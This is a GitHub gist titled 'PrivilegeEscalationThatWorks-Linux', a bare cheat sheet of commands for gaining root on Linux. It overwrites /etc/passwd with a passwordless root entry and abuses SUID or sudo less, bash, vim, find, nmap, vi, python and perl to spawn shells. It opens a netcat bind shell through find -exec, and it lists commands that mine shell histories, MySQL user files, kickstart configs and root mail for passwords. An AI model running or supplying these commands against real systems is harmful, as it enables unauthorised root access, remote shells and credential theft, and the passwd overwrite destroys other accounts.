Created
August 10, 2018 23:59
-
-
Save alexandercastillo1/f44cff90eee28ce57c279e1e87ec34ce to your computer and use it in GitHub Desktop.
PrivilegeEscalationThatWorks-Linux
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **/etc/passwd full permissions** | |
| ls -la /etc/passwd (if output is "-rwxrwxrwx") | |
| echo root::0:0:root:/root:/bin/bash > /etc/passwd | |
| su | |
| **SUID LESS / MORE** | |
| less /etc/passwd | |
| !/bin/sh | |
| **SUID Bash** | |
| bash -p | |
| **SUID vim.tiny** | |
| vim.tiny | |
| :set shell=/bin/sh | |
| :shell | |
| **SUID find** | |
| touch privilegeescalation | |
| find privilegeescalation -exec whoami \; | |
| or bind shell getting root | |
| find privilegeescalation -exec netcat -lvp 5555 -e /bin/sh \; | |
| from attacker | |
| netcat target-ip 5555 | |
| id | |
| **SUID NMAP** | |
| nmap -V (output has to be versions 2.02 to 5.21) | |
| !sh | |
| **vi running as root** | |
| sudo vi | |
| :shell | |
| :set shell=/bin/bash:shell | |
| :!bash | |
| **python running as root** | |
| sudo python -c 'import pty;pty.spawn("/bin/bash");' | |
| **perl running as root** | |
| sudo perl | |
| exec "/bin/bash"; | |
| crt-d | |
| **Password mining** | |
| cat ~/.bash_history | grep -i passw | |
| cat ~/./nano_history | grep -i passw | |
| cat ~/.atftp_history | grep -i passw | |
| cat ~/.mysql_history | grep -i passw | |
| cat ~/.php_history | grep -i passw | |
| cat /var/apache2/config.inc | |
| cat /var/lib/mysql/mysql/user.MYD | |
| cat /root/anaconda-ks.cfg | |
| cat ~/.bashrc | |
| cat ~/.profile | |
| cat /var/mail/root | |
| cat /var/spool/mail/root |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment